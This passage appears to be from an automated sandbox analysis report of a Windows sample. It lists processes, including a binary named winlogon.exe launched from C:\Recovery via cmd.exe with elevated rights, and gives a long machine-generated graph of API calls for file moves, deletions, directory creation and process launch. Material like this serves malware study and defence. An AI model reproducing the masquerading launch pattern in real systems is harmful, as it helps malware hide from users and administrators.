                                                                                            Has exited:true

                                                                                            Target ID:43
                                                                                            Start time:15:27:17
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Recovery\winlogon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Recovery\winlogon.exe"
                                                                                            Imagebase:0x230000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:48
                                                                                            Start time:15:27:18
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe"
                                                                                            Imagebase:0x7ff6ccd10000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:49
                                                                                            Start time:15:27:18
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false


                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.3%
                                                                                              Total number of Nodes:1635
                                                                                              Total number of Limit Nodes:58
                                                                                              execution_graph
24909->24872 24910->24857 24911->24857 24912->24857 24914 a4a6a4 24913->24914 24915 a4a6b1 24914->24915 24916 a4a6bc 24914->24916 24941 a4a7fe 24915->24941 24917 a4a6c4 24916->24917 24918 a4a6cd __dosmaperr 24916->24918 24920 a4a66a _free 20 API calls 24917->24920 24921 a4a6f7 HeapReAlloc 24918->24921 24922 a4a6d2 24918->24922 24949 a48e5c 7 API calls 2 library calls 24918->24949 24923 a4a6b9 24920->24923 24921->24918 24921->24923 24948 a4a7eb 20 API calls __dosmaperr 24922->24948 24923->24857 24926->24857 24933 a2b4d3 24927->24933 24930->24884 24931 a2cad4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24931->24893 24932->24902 24934 a3ffd0 24933->24934 24935 a2b4e0 GetFileAttributesW 24934->24935 24936 a2b4f1 24935->24936 24937 a2b4ca 24935->24937 24938 a2cf32 GetCurrentDirectoryW 24936->24938 24937->24891 24937->24931 24939 a2b505 24938->24939 24939->24937 24940 a2b509 GetFileAttributesW 24939->24940 24940->24937 24942 a4a83c 24941->24942 24946 a4a80c __dosmaperr 24941->24946 24951 a4a7eb 20 API calls __dosmaperr 24942->24951 24944 a4a827 RtlAllocateHeap 24945 a4a83a 24944->24945 24944->24946 24945->24923 24946->24942 24946->24944 24950 a48e5c 7 API calls 2 library calls 24946->24950 24948->24923 24949->24918 24950->24946 24951->24945 26098 a3bde0 73 API calls 26099 a505e1 21 API calls __vswprintf_c_l 26145 a473e0 QueryPerformanceFrequency QueryPerformanceCounter 26126 a4c66e 27 API calls _ValidateLocalCookies 26127 a3c2f3 78 API calls 26101 a3edf1 DialogBoxParamW 24960 a4ccf0 24961 a4ccf9 24960->24961 24962 a4cd02 24960->24962 24964 a4cbe7 24961->24964 24965 a4a515 _abort 38 API calls 24964->24965 24966 a4cbf4 24965->24966 24984 a4cd0e 24966->24984 24968 a4cbfc 24993 a4c97b 24968->24993 24971 a4cc13 24971->24962 24972 a4a7fe __vswprintf_c_l 21 API calls 24973 a4cc24 24972->24973 24983 a4cc56 24973->24983 25000 a4cdb0 24973->25000 24976 a4a66a _free 20 API calls 24976->24971 24977 a4cc51 25010 a4a7eb 20 API calls __dosmaperr 24977->25010 24979 a4cc9a 
24979->24983 25011 a4c851 26 API calls 24979->25011 24980 a4cc6e 24980->24979 24981 a4a66a _free 20 API calls 24980->24981 24981->24979 24983->24976 24985 a4cd1a __FrameHandler3::FrameUnwindToState 24984->24985 24986 a4a515 _abort 38 API calls 24985->24986 24988 a4cd24 24986->24988 24989 a4cda8 _abort 24988->24989 24992 a4a66a _free 20 API calls 24988->24992 25012 a4a0f4 38 API calls _abort 24988->25012 25013 a4bdf1 EnterCriticalSection 24988->25013 25014 a4cd9f LeaveCriticalSection _abort 24988->25014 24989->24968 24992->24988 24994 a45944 __fassign 38 API calls 24993->24994 24995 a4c98d 24994->24995 24996 a4c99c GetOEMCP 24995->24996 24997 a4c9ae 24995->24997 24999 a4c9c5 24996->24999 24998 a4c9b3 GetACP 24997->24998 24997->24999 24998->24999 24999->24971 24999->24972 25001 a4c97b 40 API calls 25000->25001 25002 a4cdcf 25001->25002 25003 a4cdd6 25002->25003 25005 a4ce20 IsValidCodePage 25002->25005 25008 a4ce45 _abort 25002->25008 25004 a40d7c _ValidateLocalCookies 5 API calls 25003->25004 25006 a4cc49 25004->25006 25005->25003 25007 a4ce32 GetCPInfo 25005->25007 25006->24977 25006->24980 25007->25003 25007->25008 25015 a4ca53 GetCPInfo 25008->25015 25010->24983 25011->24983 25013->24988 25014->24988 25019 a4ca8d 25015->25019 25024 a4cb37 25015->25024 25018 a40d7c _ValidateLocalCookies 5 API calls 25021 a4cbe3 25018->25021 25025 a4db48 25019->25025 25021->25003 25023 a4bd38 __vswprintf_c_l 43 API calls 25023->25024 25024->25018 25026 a45944 __fassign 38 API calls 25025->25026 25027 a4db68 MultiByteToWideChar 25026->25027 25029 a4dba6 25027->25029 25030 a4dc3e 25027->25030 25033 a4a7fe __vswprintf_c_l 21 API calls 25029->25033 25036 a4dbc7 _abort __vsnwprintf_l 25029->25036 25031 a40d7c _ValidateLocalCookies 5 API calls 25030->25031 25034 a4caee 25031->25034 25032 a4dc38 25044 a4bd83 20 API calls _free 25032->25044 25033->25036 25039 a4bd38 25034->25039 25036->25032 25037 a4dc0c MultiByteToWideChar 25036->25037 25037->25032 25038 a4dc28 GetStringTypeW 25037->25038 
25038->25032 25040 a45944 __fassign 38 API calls 25039->25040 25041 a4bd4b 25040->25041 25045 a4bb1b 25041->25045 25044->25030 25046 a4bb36 __vswprintf_c_l 25045->25046 25047 a4bb5c MultiByteToWideChar 25046->25047 25048 a4bb86 25047->25048 25049 a4bd10 25047->25049 25052 a4a7fe __vswprintf_c_l 21 API calls 25048->25052 25055 a4bba7 __vsnwprintf_l 25048->25055 25050 a40d7c _ValidateLocalCookies 5 API calls 25049->25050 25051 a4bd23 25050->25051 25051->25023 25052->25055 25053 a4bbf0 MultiByteToWideChar 25054 a4bc5c 25053->25054 25056 a4bc09 25053->25056 25081 a4bd83 20 API calls _free 25054->25081 25055->25053 25055->25054 25072 a4c12c 25056->25072 25060 a4bc33 25060->25054 25064 a4c12c __vswprintf_c_l 11 API calls 25060->25064 25061 a4bc6b 25062 a4a7fe __vswprintf_c_l 21 API calls 25061->25062 25067 a4bc8c __vsnwprintf_l 25061->25067 25062->25067 25063 a4bd01 25080 a4bd83 20 API calls _free 25063->25080 25064->25054 25065 a4c12c __vswprintf_c_l 11 API calls 25068 a4bce0 25065->25068 25067->25063 25067->25065 25068->25063 25069 a4bcef WideCharToMultiByte 25068->25069 25069->25063 25070 a4bd2f 25069->25070 25082 a4bd83 20 API calls _free 25070->25082 25073 a4be58 __dosmaperr 5 API calls 25072->25073 25074 a4c153 25073->25074 25076 a4c15c 25074->25076 25083 a4c1b4 10 API calls 3 library calls 25074->25083 25078 a40d7c _ValidateLocalCookies 5 API calls 25076->25078 25077 a4c19c LCMapStringW 25077->25076 25079 a4bc20 25078->25079 25079->25054 25079->25060 25079->25061 25080->25054 25081->25049 25082->25054 25083->25077 26070 a410f0 LocalFree 26102 a4d1f0 GetProcessHeap 25092 a213fd 43 API calls 2 library calls 26072 a4b8c0 21 API calls 26073 a49cc0 7 API calls ___scrt_uninitialize_crt 26103 a53dc0 VariantClear 26147 a503c0 51 API calls 25097 a3dfcc 25098 a3dfd5 GetTempPathW 25097->25098 25113 a3d8d8 _wcslen _wcsrchr 25097->25113 25103 a3dff5 25098->25103 25100 a24a20 _swprintf 51 API calls 25100->25103 25101 a3e54f 25102 a2b4c1 3 API calls 25102->25103 25103->25100 
25103->25102 25104 a3e02c SetDlgItemTextW 25103->25104 25105 a3e049 25104->25105 25104->25113 25110 a3e12f EndDialog 25105->25110 25105->25113 25107 a3dbac SetWindowTextW 25107->25113 25110->25113 25111 a4521e 22 API calls 25111->25113 25113->25101 25113->25107 25113->25111 25114 a3d99a SetFileAttributesW 25113->25114 25126 a3d9b4 _abort _wcslen 25113->25126 25128 a33316 CompareStringW 25113->25128 25129 a3b65d GetCurrentDirectoryW 25113->25129 25131 a2b9ca 6 API calls 25113->25131 25132 a2b953 FindClose 25113->25132 25133 a3c67e 76 API calls 2 library calls 25113->25133 25134 a3c504 ExpandEnvironmentStringsW 25113->25134 25116 a3da54 GetFileAttributesW 25114->25116 25114->25126 25116->25113 25118 a3da66 DeleteFileW 25116->25118 25118->25113 25120 a3da77 25118->25120 25119 a3dd76 GetDlgItem SetWindowTextW SendMessageW 25119->25126 25121 a24a20 _swprintf 51 API calls 25120->25121 25123 a3da97 GetFileAttributesW 25121->25123 25122 a3ddb6 SendMessageW 25122->25113 25123->25120 25124 a3daac MoveFileW 25123->25124 25124->25113 25125 a3dac4 MoveFileExW 25124->25125 25125->25113 25126->25113 25126->25119 25126->25122 25127 a3da30 SHFileOperationW 25126->25127 25130 a2cdc0 51 API calls 2 library calls 25126->25130 25127->25116 25128->25113 25129->25113 25130->25126 25131->25113 25132->25113 25133->25113 25134->25113 25136 a3c9d0 25137 a3c9da __EH_prolog 25136->25137 25308 a212f6 25137->25308 25140 a3d10b 25394 a3e7ee 25140->25394 25141 a3ca1a 25144 a3ca8b 25141->25144 25145 a3ca28 25141->25145 25218 a3ca31 25141->25218 25148 a3cb1e GetDlgItemTextW 25144->25148 25154 a3caa1 25144->25154 25149 a3ca68 25145->25149 25150 a3ca2c 25145->25150 25146 a3d126 SendMessageW 25147 a3d134 25146->25147 25151 a3d14e GetDlgItem SendMessageW 25147->25151 25152 a3d13d SendDlgItemMessageW 25147->25152 25148->25149 25153 a3cb5b 25148->25153 25157 a3cb4f EndDialog 25149->25157 25149->25218 25155 a2f937 53 API calls 25150->25155 25150->25218 25412 a3b65d GetCurrentDirectoryW 25151->25412 
25152->25151 25158 a3cb70 GetDlgItem 25153->25158 25306 a3cb64 25153->25306 25159 a2f937 53 API calls 25154->25159 25160 a3ca4b 25155->25160 25157->25218 25162 a3cba7 SetFocus 25158->25162 25163 a3cb84 SendMessageW SendMessageW 25158->25163 25164 a3cabe SetDlgItemTextW 25159->25164 25434 a2122f SHGetMalloc 25160->25434 25161 a3d17e GetDlgItem 25166 a3d1a1 SetWindowTextW 25161->25166 25167 a3d19b 25161->25167 25168 a3cbb7 25162->25168 25178 a3cbc3 25162->25178 25163->25162 25169 a3cac9 25164->25169 25413 a3bbc0 GetClassNameW 25166->25413 25167->25166 25172 a2f937 53 API calls 25168->25172 25176 a3cad6 GetMessageW 25169->25176 25169->25218 25170 a3d051 25174 a2f937 53 API calls 25170->25174 25173 a3cbc1 25172->25173 25318 a3e619 25173->25318 25180 a3d061 SetDlgItemTextW 25174->25180 25177 a3caed IsDialogMessageW 25176->25177 25176->25218 25177->25169 25182 a3cafc TranslateMessage DispatchMessageW 25177->25182 25186 a2f937 53 API calls 25178->25186 25179 a3d3f8 SetDlgItemTextW 25179->25218 25184 a3d075 25180->25184 25182->25169 25190 a2f937 53 API calls 25184->25190 25189 a3cbfa 25186->25189 25187 a3cc1d 25191 a3cc51 25187->25191 25195 a2b4c1 3 API calls 25187->25195 25188 a3d1ec 25193 a3d21c 25188->25193 25196 a2f937 53 API calls 25188->25196 25194 a24a20 _swprintf 51 API calls 25189->25194 25222 a3d098 _wcslen 25190->25222 25338 a2b341 25191->25338 25192 a3d884 98 API calls 25192->25188 25201 a3d884 98 API calls 25193->25201 25243 a3d2d4 25193->25243 25194->25173 25198 a3cc47 25195->25198 25199 a3d1ff SetDlgItemTextW 25196->25199 25198->25191 25328 a3beff 25198->25328 25206 a2f937 53 API calls 25199->25206 25209 a3d237 25201->25209 25202 a3d387 25203 a3d390 EnableWindow 25202->25203 25204 a3d399 25202->25204 25203->25204 25210 a3d3b6 25204->25210 25443 a212b3 GetDlgItem KiUserCallbackDispatcher 25204->25443 25205 a3d0e9 25213 a2f937 53 API calls 25205->25213 25212 a3d213 SetDlgItemTextW 25206->25212 25207 a3cc6a GetLastError 25208 a3cc75 25207->25208 25344 a3bc19 
SetCurrentDirectoryW 25208->25344 25220 a3d249 25209->25220 25242 a3d26e 25209->25242 25217 a3d3dd 25210->25217 25231 a3d3d5 SendMessageW 25210->25231 25212->25193 25213->25218 25215 a3d2c7 25223 a3d884 98 API calls 25215->25223 25217->25218 25227 a2f937 53 API calls 25217->25227 25219 a3cc89 25224 a3cca0 25219->25224 25225 a3cc92 GetLastError 25219->25225 25441 a3aef5 32 API calls 25220->25441 25221 a3d3ac 25444 a212b3 GetDlgItem KiUserCallbackDispatcher 25221->25444 25222->25205 25230 a2f937 53 API calls 25222->25230 25223->25243 25233 a3ccb0 GetTickCount 25224->25233 25234 a3cd26 25224->25234 25283 a3cd17 25224->25283 25225->25224 25232 a3ca52 25227->25232 25228 a3d262 25228->25242 25235 a3d0cc 25230->25235 25231->25217 25232->25179 25232->25218 25241 a24a20 _swprintf 51 API calls 25233->25241 25238 a3cef7 25234->25238 25239 a3cd3f GetModuleFileNameW 25234->25239 25240 a3ceed 25234->25240 25244 a24a20 _swprintf 51 API calls 25235->25244 25236 a3d365 25442 a3aef5 32 API calls 25236->25442 25237 a3cf52 25353 a212d1 GetDlgItem ShowWindow 25237->25353 25251 a2f937 53 API calls 25238->25251 25435 a305ed 82 API calls 25239->25435 25240->25149 25240->25238 25247 a3cccd 25241->25247 25242->25215 25252 a3d884 98 API calls 25242->25252 25243->25202 25243->25236 25248 a2f937 53 API calls 25243->25248 25244->25205 25345 a2a8ce 25247->25345 25248->25243 25249 a3d384 25249->25202 25256 a3cf01 25251->25256 25257 a3d29c 25252->25257 25253 a3cf62 25354 a212d1 GetDlgItem ShowWindow 25253->25354 25255 a3cd67 25259 a24a20 _swprintf 51 API calls 25255->25259 25260 a24a20 _swprintf 51 API calls 25256->25260 25257->25215 25261 a3d2a5 DialogBoxParamW 25257->25261 25258 a3cf6c 25262 a2f937 53 API calls 25258->25262 25263 a3cd89 CreateFileMappingW 25259->25263 25264 a3cf1f 25260->25264 25261->25149 25261->25215 25266 a3cf76 SetDlgItemTextW 25262->25266 25268 a3ce5e __InternalCxxFrameHandler 25263->25268 25269 a3cde7 GetCommandLineW 25263->25269 25277 a2f937 53 API calls 25264->25277 
25355 a212d1 GetDlgItem ShowWindow 25266->25355 25267 a3ccf3 25273 a3ccfa GetLastError 25267->25273 25274 a3cd05 25267->25274 25271 a3ce69 ShellExecuteExW 25268->25271 25272 a3cdf8 25269->25272 25285 a3ce84 25271->25285 25436 a3c615 SHGetMalloc 25272->25436 25273->25274 25276 a2a801 80 API calls 25274->25276 25275 a3cf88 SetDlgItemTextW GetDlgItem 25279 a3cfa5 GetWindowLongW SetWindowLongW 25275->25279 25280 a3cfbd 25275->25280 25276->25283 25281 a3cf39 25277->25281 25279->25280 25356 a3d884 25280->25356 25282 a3ce14 25437 a3c615 SHGetMalloc 25282->25437 25283->25234 25283->25237 25290 a3cec7 25285->25290 25291 a3ce99 WaitForInputIdle 25285->25291 25288 a3ce20 25438 a3c615 SHGetMalloc 25288->25438 25289 a3d884 98 API calls 25293 a3cfd9 25289->25293 25290->25240 25299 a3cedd UnmapViewOfFile CloseHandle 25290->25299 25294 a3ceae 25291->25294 25382 a3eba2 25293->25382 25294->25290 25298 a3ceb3 Sleep 25294->25298 25295 a3ce2c 25439 a3069c 82 API calls 25295->25439 25298->25290 25298->25294 25299->25240 25300 a3ce3d MapViewOfFile 25300->25268 25302 a3d884 98 API calls 25305 a3cfff 25302->25305 25303 a3d028 25440 a212b3 GetDlgItem KiUserCallbackDispatcher 25303->25440 25305->25303 25307 a3d884 98 API calls 25305->25307 25306->25149 25306->25170 25307->25303 25309 a21358 25308->25309 25310 a212ff 25308->25310 25446 a2f5e1 GetWindowLongW SetWindowLongW 25309->25446 25312 a21365 25310->25312 25445 a2f608 62 API calls 2 library calls 25310->25445 25312->25140 25312->25141 25312->25218 25314 a21321 25314->25312 25315 a21334 GetDlgItem 25314->25315 25315->25312 25316 a21344 25315->25316 25316->25312 25317 a2134a SetWindowTextW 25316->25317 25317->25312 25319 a3c758 5 API calls 25318->25319 25320 a3e625 GetDlgItem 25319->25320 25321 a3e647 25320->25321 25322 a3e67b SendMessageW SendMessageW 25320->25322 25325 a3e652 ShowWindow SendMessageW SendMessageW 25321->25325 25323 a3e6b7 25322->25323 25324 a3e6d6 SendMessageW SendMessageW SendMessageW 25322->25324 25323->25324 25326 
a3e709 SendMessageW 25324->25326 25327 a3e72c SendMessageW 25324->25327 25325->25322 25326->25327 25327->25187 25447 a3c324 GetCurrentProcess OpenProcessToken 25328->25447 25330 a3bf14 25331 a3bfad 25330->25331 25332 a3bf1c SetEntriesInAclW 25330->25332 25331->25191 25332->25331 25333 a3bf60 InitializeSecurityDescriptor 25332->25333 25334 a3bf9f 25333->25334 25335 a3bf6f SetSecurityDescriptorDacl 25333->25335 25334->25331 25337 a3bfa4 LocalFree 25334->25337 25335->25334 25336 a3bf82 CreateDirectoryW 25335->25336 25336->25334 25337->25331 25341 a2b34b 25338->25341 25339 a2b3dc 25340 a2b542 8 API calls 25339->25340 25342 a2b405 25339->25342 25340->25342 25341->25339 25341->25342 25454 a2b542 25341->25454 25342->25207 25342->25208 25344->25219 25346 a2a8d8 25345->25346 25347 a2a935 CreateFileW 25346->25347 25348 a2a929 25346->25348 25347->25348 25349 a2a97f 25348->25349 25350 a2cf32 GetCurrentDirectoryW 25348->25350 25349->25267 25351 a2a964 25350->25351 25351->25349 25352 a2a968 CreateFileW 25351->25352 25352->25349 25353->25253 25354->25258 25355->25275 25357 a3d88e __EH_prolog 25356->25357 25358 a3cfcb 25357->25358 25475 a3c504 ExpandEnvironmentStringsW 25357->25475 25358->25289 25362 a3dbac SetWindowTextW 25367 a3d8c5 _wcslen _wcsrchr 25362->25367 25365 a4521e 22 API calls 25365->25367 25367->25358 25367->25362 25367->25365 25368 a3d99a SetFileAttributesW 25367->25368 25380 a3d9b4 _abort _wcslen 25367->25380 25476 a33316 CompareStringW 25367->25476 25477 a3b65d GetCurrentDirectoryW 25367->25477 25479 a2b9ca 6 API calls 25367->25479 25480 a2b953 FindClose 25367->25480 25481 a3c67e 76 API calls 2 library calls 25367->25481 25482 a3c504 ExpandEnvironmentStringsW 25367->25482 25370 a3da54 GetFileAttributesW 25368->25370 25368->25380 25370->25367 25372 a3da66 DeleteFileW 25370->25372 25372->25367 25374 a3da77 25372->25374 25373 a3dd76 GetDlgItem SetWindowTextW SendMessageW 25373->25380 25375 a24a20 _swprintf 51 API calls 25374->25375 25377 a3da97 GetFileAttributesW 
25375->25377 25376 a3ddb6 SendMessageW 25376->25367 25377->25374 25378 a3daac MoveFileW 25377->25378 25378->25367 25379 a3dac4 MoveFileExW 25378->25379 25379->25367 25380->25367 25380->25373 25380->25376 25381 a3da30 SHFileOperationW 25380->25381 25478 a2cdc0 51 API calls 2 library calls 25380->25478 25381->25370 25383 a3ebac __EH_prolog 25382->25383 25483 a31983 25383->25483 25385 a3ebdd 25487 a264ed 25385->25487 25387 a3ebfb 25491 a28823 25387->25491 25391 a3ec4e 25509 a2890a 25391->25509 25393 a3cfea 25393->25302 25395 a3e7f8 25394->25395 25396 a3b5d6 4 API calls 25395->25396 25397 a3e7fd 25396->25397 25398 a3e805 GetWindow 25397->25398 25399 a3d111 25397->25399 25398->25399 25402 a3e825 25398->25402 25399->25146 25399->25147 25400 a3e832 GetClassNameW 26034 a33316 CompareStringW 25400->26034 25402->25399 25402->25400 25403 a3e856 GetWindowLongW 25402->25403 25404 a3e8ba GetWindow 25402->25404 25403->25404 25405 a3e866 SendMessageW 25403->25405 25404->25399 25404->25402 25405->25404 25406 a3e87c GetObjectW 25405->25406 26035 a3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25406->26035 25408 a3e893 26036 a3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25408->26036 26037 a3b81c 8 API calls 25408->26037 25411 a3e8a4 SendMessageW DeleteObject 25411->25404 25412->25161 25414 a3bbe1 25413->25414 25415 a3bc06 25413->25415 26038 a33316 CompareStringW 25414->26038 25416 a3bc14 25415->25416 25417 a3bc0b SHAutoComplete 25415->25417 25421 a3c217 25416->25421 25417->25416 25419 a3bbf4 25419->25415 25420 a3bbf8 FindWindowExW 25419->25420 25420->25415 25422 a3c221 __EH_prolog 25421->25422 25423 a213f8 43 API calls 25422->25423 25424 a3c243 25423->25424 26039 a22083 25424->26039 25427 a3c25d 25429 a21641 86 API calls 25427->25429 25428 a3c26c 25430 a21a7e 143 API calls 25428->25430 25431 a3c268 25429->25431 25433 a3c28b __InternalCxxFrameHandler ___std_exception_copy 25430->25433 25431->25188 25431->25192 25432 a21641 86 API calls 25432->25431 25433->25432 25434->25232 
25435->25255 25436->25282 25437->25288 25438->25295 25439->25300 25440->25306 25441->25228 25442->25249 25443->25221 25444->25210 25445->25314 25446->25312 25448 a3c344 GetTokenInformation 25447->25448 25452 a3c39b 25447->25452 25449 a3c369 ___std_exception_copy 25448->25449 25450 a3c35e GetLastError 25448->25450 25451 a3c372 GetTokenInformation 25449->25451 25450->25449 25450->25452 25451->25452 25453 a3c38c CopySid 25451->25453 25452->25330 25453->25452 25455 a2b54f 25454->25455 25456 a2b573 25455->25456 25457 a2b566 CreateDirectoryW 25455->25457 25458 a2b4c1 3 API calls 25456->25458 25457->25456 25459 a2b5a6 25457->25459 25460 a2b579 25458->25460 25462 a2b5b5 25459->25462 25467 a2b8e6 25459->25467 25461 a2b5b9 GetLastError 25460->25461 25464 a2cf32 GetCurrentDirectoryW 25460->25464 25461->25462 25462->25341 25465 a2b58f 25464->25465 25465->25461 25466 a2b593 CreateDirectoryW 25465->25466 25466->25459 25466->25461 25468 a3ffd0 25467->25468 25469 a2b8f3 SetFileAttributesW 25468->25469 25470 a2b936 25469->25470 25471 a2b909 25469->25471 25470->25462 25472 a2cf32 GetCurrentDirectoryW 25471->25472 25473 a2b91d 25472->25473 25473->25470 25474 a2b921 SetFileAttributesW 25473->25474 25474->25470 25475->25367 25476->25367 25477->25367 25478->25380 25479->25367 25480->25367 25481->25367 25482->25367 25484 a31990 _wcslen 25483->25484 25518 a21895 25484->25518 25486 a319a8 25486->25385 25488 a31983 _wcslen 25487->25488 25489 a21895 78 API calls 25488->25489 25490 a319a8 25489->25490 25490->25387 25492 a2882d __EH_prolog 25491->25492 25531 a2e298 25492->25531 25494 a28855 25495 a3febe 27 API calls 25494->25495 25496 a28899 _abort 25495->25496 25497 a3febe 27 API calls 25496->25497 25498 a288c0 25497->25498 25541 a35c64 25498->25541 25501 a28a38 25503 a28a42 25501->25503 25502 a28ab5 25506 a28b1a 25502->25506 25562 a290a2 25502->25562 25503->25502 25584 a2b966 25503->25584 25505 a28b5c 25505->25391 25506->25505 25590 a21397 74 API calls 25506->25590 26030 a2a41a 25509->26030 
25511 a2892b 25512 a33546 86 API calls 25511->25512 25513 a2893c Concurrency::cancel_current_task 25511->25513 25512->25513 25514 a22111 26 API calls 25513->25514 25515 a28963 25514->25515 25516 a2e339 86 API calls 25515->25516 25517 a2896b 25516->25517 25517->25393 25519 a218a7 25518->25519 25526 a218ff 25518->25526 25520 a218d0 25519->25520 25528 a276e9 76 API calls __vswprintf_c_l 25519->25528 25522 a4521e 22 API calls 25520->25522 25524 a218f0 25522->25524 25523 a218c6 25529 a2775a 75 API calls 25523->25529 25524->25526 25530 a2775a 75 API calls 25524->25530 25526->25486 25528->25523 25529->25520 25530->25526 25532 a2e2a2 __EH_prolog 25531->25532 25533 a3febe 27 API calls 25532->25533 25534 a2e2e5 25533->25534 25535 a2e2f8 25534->25535 25547 a26891 25534->25547 25537 a3febe 27 API calls 25535->25537 25538 a2e309 25537->25538 25539 a2e31c 25538->25539 25540 a26891 41 API calls 25538->25540 25539->25494 25540->25539 25542 a35c6e __EH_prolog 25541->25542 25543 a3febe 27 API calls 25542->25543 25544 a35c8a 25543->25544 25545 a288f2 25544->25545 25561 a32166 80 API calls 25544->25561 25545->25501 25548 a2689b __EH_prolog 25547->25548 25553 a40023 25548->25553 25550 a268b7 25551 a40023 41 API calls 25550->25551 25552 a268d9 _abort 25551->25552 25552->25535 25554 a4002f __FrameHandler3::FrameUnwindToState 25553->25554 25555 a4005a 25554->25555 25557 a26920 25554->25557 25555->25550 25558 a2692a __EH_prolog 25557->25558 25559 a304e5 41 API calls 25558->25559 25560 a26936 25559->25560 25560->25554 25561->25545 25563 a290ac __EH_prolog 25562->25563 25591 a213f8 25563->25591 25565 a290c8 25566 a290d9 25565->25566 25755 a2b1d2 25565->25755 25570 a29110 25566->25570 25603 a21ad3 25566->25603 25569 a2910c 25569->25570 25622 a22032 25569->25622 25747 a21641 25570->25747 25574 a291b2 25626 a2924e 25574->25626 25577 a29211 25577->25570 25634 a24264 25577->25634 25646 a292c6 25577->25646 25582 a2b966 7 API calls 25583 a29139 25582->25583 25583->25574 25583->25582 25759 a2d4d2 
CompareStringW _wcslen 25583->25759 25585 a2b97b 25584->25585 25589 a2b9a9 25585->25589 26019 a2ba94 25585->26019 25587 a2b98b 25588 a2b990 FindClose 25587->25588 25587->25589 25588->25589 25589->25503 25590->25505 25592 a213fd __EH_prolog 25591->25592 25593 a26891 41 API calls 25592->25593 25594 a21428 25593->25594 25595 a2e298 41 API calls 25594->25595 25596 a21437 25595->25596 25597 a3febe 27 API calls 25596->25597 25601 a214ab 25596->25601 25599 a21498 25597->25599 25599->25601 25602 a2644d 43 API calls 25599->25602 25600 a21533 _abort 25600->25565 25760 a2c1f7 25601->25760 25602->25601 25604 a21add __EH_prolog 25603->25604 25616 a21b30 25604->25616 25619 a21c63 25604->25619 25778 a213d9 25604->25778 25606 a21c9e 25781 a21397 74 API calls 25606->25781 25609 a24264 116 API calls 25613 a21ce9 25609->25613 25610 a21cab 25610->25609 25610->25619 25611 a21d31 25615 a21d64 25611->25615 25611->25619 25782 a21397 74 API calls 25611->25782 25613->25611 25614 a24264 116 API calls 25613->25614 25614->25613 25615->25619 25620 a2b110 79 API calls 25615->25620 25616->25606 25616->25610 25616->25619 25617 a24264 116 API calls 25618 a21db5 25617->25618 25618->25617 25618->25619 25619->25569 25620->25618 25621 a2b110 79 API calls 25621->25616 25624 a22037 __EH_prolog 25622->25624 25623 a22068 25623->25583 25624->25623 25796 a21a7e 25624->25796 25919 a2e395 25626->25919 25628 a2925e 25923 a32701 GetSystemTime SystemTimeToFileTime 25628->25923 25630 a291cc 25630->25577 25631 a32eb4 25630->25631 25928 a3efab 25631->25928 25635 a24270 25634->25635 25636 a24274 25634->25636 25635->25577 25645 a2b110 79 API calls 25636->25645 25637 a24286 25638 a242a1 25637->25638 25639 a242af 25637->25639 25644 a242e1 25638->25644 25936 a2395a 104 API calls 3 library calls 25638->25936 25937 a22eb6 116 API calls 3 library calls 25639->25937 25642 a242ad 25642->25644 25938 a22544 74 API calls 25642->25938 25644->25577 25645->25637 25647 a292d0 __EH_prolog 25646->25647 25650 a2930e 25647->25650 25657 
a2973d Concurrency::cancel_current_task 25647->25657 25957 a39cad 118 API calls 25647->25957 25649 a2a18d 25651 a2a192 25649->25651 25652 a2a1c5 25649->25652 25650->25649 25655 a2932f 25650->25655 25650->25657 25651->25657 25987 a28675 168 API calls 25651->25987 25652->25657 25988 a39cad 118 API calls 25652->25988 25655->25657 25939 a266df 25655->25939 25657->25577 25658 a29405 25659 a29545 25658->25659 25958 a2b5d6 57 API calls 3 library calls 25658->25958 25659->25657 25665 a29669 25659->25665 25960 a28f6b 38 API calls 25659->25960 25663 a295ac 25959 a48a18 26 API calls ___std_exception_copy 25663->25959 25667 a2b966 7 API calls 25665->25667 25669 a296db 25665->25669 25667->25669 25668 a29935 25967 a2e4a9 96 API calls 25668->25967 25945 a289c8 25669->25945 25672 a2976c 25696 a297c5 25672->25696 25961 a24727 41 API calls 2 library calls 25672->25961 25675 a29990 25676 a29a3a 25675->25676 25682 a299bb 25675->25682 25679 a29a8c 25676->25679 25694 a29a45 25676->25694 25686 a29a2c 25679->25686 25971 a28db3 119 API calls 25679->25971 25680 a29a8a 25687 a2a801 80 API calls 25680->25687 25681 a2a14a 25688 a2a801 80 API calls 25681->25688 25683 a29ae8 25682->25683 25682->25686 25689 a2b4c1 3 API calls 25682->25689 25683->25681 25684 a29b53 25683->25684 25972 a2ab1c 25683->25972 25692 a2bf0a 27 API calls 25684->25692 25686->25680 25686->25683 25687->25657 25688->25657 25690 a299f3 25689->25690 25690->25686 25969 a2a50a 97 API calls 25690->25969 25695 a29ba2 25692->25695 25694->25680 25970 a28b7c 123 API calls 25694->25970 25700 a2bf0a 27 API calls 25695->25700 25696->25657 25697 a298ed 25696->25697 25703 a298f4 Concurrency::cancel_current_task 25696->25703 25962 a287fb 41 API calls 25696->25962 25963 a2e4a9 96 API calls 25696->25963 25964 a2237a 74 API calls 25696->25964 25965 